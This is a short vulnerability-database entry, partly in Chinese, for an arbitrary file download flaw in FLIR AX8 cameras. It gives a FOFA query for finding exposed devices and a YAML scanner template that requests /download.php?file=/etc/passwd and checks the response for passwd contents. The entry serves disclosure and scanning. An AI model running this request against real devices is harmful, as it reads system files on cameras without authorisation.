flix-ax8-download-read-file: FLIR-AX8 download.php 任意文件下载

2025-08-01 FLIR AX8 PoC Public

Description

FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞

fofa: app="FLIR-FLIR-AX8"

PoC

id: flix-ax8-download-read-file

info:
  name: FLIR-AX8 download.php 任意文件下载
  author: zan8in
  severity: high
  description: |
    FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
    fofa: app="FLIR-FLIR-AX8"
  tags: flir,ax8,download,read-file
  created: 2023/11/14

rules:
  r0:
    request:
      method: GET
      path: /download.php?file=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities